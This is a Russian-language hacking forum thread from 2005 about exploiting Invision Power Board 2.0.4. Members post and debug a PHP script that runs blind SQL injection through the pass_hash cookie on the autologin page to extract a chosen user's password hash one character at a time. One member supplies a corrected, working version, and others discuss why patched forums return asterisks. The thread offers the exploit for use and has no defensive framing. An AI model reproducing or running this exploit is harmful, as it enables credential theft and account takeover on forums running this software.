Форумы Исправный сплоит под ИПБ 2.0.4

Discussion in 'Уязвимости CMS/форумов' started by devil, 28 Jul 2005.

  1. devil

    devil New Member

    Joined:
    14 Jul 2005
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    вся спасибо я нашёл ошибку...только дыру залатали уже -((
     
  2. Loo

    Loo New Member

    Joined:
    1 Jun 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    WizART
    да слышь, харе уже.....
    просто у миня всё было... (актив перл) а LWP не пашет...
    devil
    ну есессно заделали, не идиоты ведь, навена..
     
  3. Loo

    Loo New Member

    Joined:
    1 Jun 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    ладно, поф на юзерагент
    объясните, вот тут ошибка в 7 строке пишет, но почему??
    <?
    set_time_limit(999999);
    $zap="http://staff/forum/index.php?act=Login&CODE=autologin" ;
    $user=3;
    $sh=array("0","1","2","3","4","5","6","7","8","9","a","b","c ","d","e","f");
    $hash=;
    for( $i=1; $i <33; $i++ ){
    for( $j=0; $j < 16; $j++ ){
    $current=$sh[$j];
    $sql="99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$ current%2527)/*";
    #$sql="99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1) %3d%2527$current%2527)/*";
    $cook="pass_hash=$sql;member_id=$user";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 2);
    curl_setopt($ch, CURLOPT_URL, $zap);
    curl_setopt($ch, CURLOPT_COOKIE, $cook);
    $xyz = curl_exec ($ch);
    curl_close ($ch);
    if (preg_match("/CODE/i", $xyz)) {
    } else {
    $hash.=$sh[$j];
    }
    }
    }
    echo $hash;
    ?>
     
  4. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    М-даа...фатально...
     
  5. Nexwill

    Nexwill Elder - Старейшина

    Joined:
    2 Aug 2005
    Messages:
    132
    Likes Received:
    45
    Reputations:
    22
    Подскажите , почему место хеша мне выдаёт такую хрень: ******************
     
  6. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    иЩи АшиПки и правь сплойт!
     
  7. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    2 ProTeuS нет там общибок просто сплойт старый а форум пропаченный...
    вот и выдает ***** или 0000
     
  8. Nexwill

    Nexwill Elder - Старейшина

    Joined:
    2 Aug 2005
    Messages:
    132
    Likes Received:
    45
    Reputations:
    22
    А где можно сплоит новый найти?))))
     
  9. nighthunter

    nighthunter New Member

    Joined:
    26 Aug 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Loo
    В скрипте куча ошибок.
    Вот с исправлениями:

    <?
    set_time_limit(0);
    $zap='http://.ua/forum/index.php?act=Login&CODE=autologin' ;
    $user=1;
    $sh=array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
    $hash='';
    for( $i=1; $i < 33; $i++ ){
    for( $j=0; $j < 16; $j++ ){
    $current=$sh[$j];
    $sql='99%2527+OR+(id%3d'.$user.'+AND+MID(password,'.$i.',1)%3d%2527'.$current.'%2527)/*';
    //Для ИПБ 2.*
    //$sql="99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1) %3d%2527$current%2527)/*";
    $cook='pass_hash='.$sql.';member_id='.$user.'';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 2);
    curl_setopt($ch, CURLOPT_URL, $zap);
    curl_setopt($ch, CURLOPT_COOKIE, $cook);
    $xyz = curl_exec($ch);
    curl_close ($ch);
    if (preg_match("/CODE/i", $xyz)) {
    }
    else
    {
    $hash.=$sh[$j];
    }
    }
    }
    echo $hash;
    ?>
     
  10. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    $crcheck = ""; вот тут ашипка, поставь нужное значение (=$i) между кавычками и будет тебе хеш вместо ****
    $crcheck = "=$i";
     
    1 person likes this.